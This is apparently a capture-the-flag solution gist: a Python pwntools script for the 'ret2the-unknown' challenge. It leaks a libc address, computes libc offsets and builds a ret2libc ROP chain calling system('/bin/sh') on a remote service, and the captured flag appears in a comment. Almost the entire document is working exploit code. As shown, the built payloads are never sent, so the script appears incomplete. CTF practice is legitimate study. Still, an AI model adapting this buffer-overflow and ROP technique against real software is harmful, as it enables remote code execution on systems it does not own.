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Created April 25, 2023 12:59
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#!/usr/bin/env python3
from pwn import *
from pwnlib.util.packing import p64
context.log_level = logging.DEBUG
target = remote('', 31568)
# target = process("./ret2the-unknown")
pMainPLT = 0x401186 # main() PLT addr
# libc base addr leak
payload = b"A"*(32+8)
payload += p64(pMainPLT) # Re-exec main
data = target.recvuntil("good luck!")
data = data.split(b"\n")
data = [l for l in data if b"get there:" in l]
leaked_addr = int(b"0x" + data[0].split()[-1],16)
print(f"[+] Leaked: {hex(leaked_addr)}")
pPrintf = leaked_addr
# Local
# pPopRDI = 0x4012a3 # pop rdi; ret;
# pBinSh = pPrintf + 0x133462 # 0x7ffff7f78152 "/bin/sh"
# pSystem = pPrintf - 0xdea0 # 0x7ffff7e36e50 system()
# pExit = (pPrintf - 0x56cf0) + 0x3e660
# Remote
pLibcBase = pPrintf - 0x58560
pPopRDI = 0x4012a3
pBinSh = pLibcBase + 0x181519
pSystem = pLibcBase + 0x449c0
pExit = pLibcBase + 0x39ea0
payload = b"A"*(32+8)
payload += p64(pPopRDI)
payload += p64(pBinSh)
payload += p64(pSystem)
payload += p64(pExit)
# flag{rob-is-proud-of-me-for-exploring-the-unknown-but-i-still-cant-afford-housing}
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